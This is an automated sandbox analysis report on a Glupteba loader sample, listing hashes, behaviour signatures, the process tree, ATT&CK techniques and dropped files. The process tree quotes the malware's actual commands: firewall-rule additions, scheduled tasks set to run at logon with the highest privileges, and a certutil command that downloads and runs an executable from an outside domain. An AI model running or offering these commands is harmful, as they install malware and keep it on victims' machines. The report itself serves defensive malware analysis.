Analysis

  • max time kernel
    110s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 22:07

General

  • Target

    59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe

  • Size

    3.8MB

  • MD5

    be737bbd92519d634ee9f64ec3b921a9

  • SHA1

    2f774c2aa118105f6c01a612323a36b130703616

  • SHA256

    59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410

  • SHA512

    41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
    "C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4628
    • C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe
      "C:\Users\Admin\AppData\Local\Temp\59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:724
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2192
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:2212
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:340
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:4136
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4548
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:3572
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3732
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2816
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:1716
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:556

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        be737bbd92519d634ee9f64ec3b921a9

        SHA1

        2f774c2aa118105f6c01a612323a36b130703616

        SHA256

        59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410

        SHA512

        41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        be737bbd92519d634ee9f64ec3b921a9

        SHA1

        2f774c2aa118105f6c01a612323a36b130703616

        SHA256

        59fea5e1012febef552be4ad0cac971bd335783c49600471fcc6e8d2bc4fb410

        SHA512

        41a0842892b1e9ba3fd4a776b6427539ca2f5907887ca6fc5d6e0c0f43b8a4354bebe0a005cde572d8a65871cf8167ec5fc3a31c1f159cfef443f07d657309e5

      • memory/340-139-0x0000000000000000-mapping.dmp
      • memory/724-133-0x0000000000000000-mapping.dmp
      • memory/724-136-0x000000000133C000-0x00000000016E2000-memory.dmp
        Filesize

        3.6MB

      • memory/724-137-0x00000000016F0000-0x0000000001DE5000-memory.dmp
        Filesize

        7.0MB

      • memory/724-138-0x0000000000400000-0x0000000000FE5000-memory.dmp
        Filesize

        11.9MB

      • memory/1716-150-0x0000000000000000-mapping.dmp
      • memory/2192-134-0x0000000000000000-mapping.dmp
      • memory/2212-135-0x0000000000000000-mapping.dmp
      • memory/2816-148-0x0000000000000000-mapping.dmp
      • memory/3572-146-0x0000000000000000-mapping.dmp
      • memory/3732-147-0x0000000000000000-mapping.dmp
      • memory/4136-140-0x0000000000000000-mapping.dmp
      • memory/4548-145-0x0000000000400000-0x0000000000FE5000-memory.dmp
        Filesize

        11.9MB

      • memory/4548-144-0x0000000001800000-0x0000000001BA6000-memory.dmp
        Filesize

        3.6MB

      • memory/4548-141-0x0000000000000000-mapping.dmp
      • memory/4628-130-0x00000000013AB000-0x0000000001751000-memory.dmp
        Filesize

        3.6MB

      • memory/4628-132-0x0000000000400000-0x0000000000FE5000-memory.dmp
        Filesize

        11.9MB

      • memory/4628-131-0x0000000001760000-0x0000000001E55000-memory.dmp
        Filesize

        7.0MB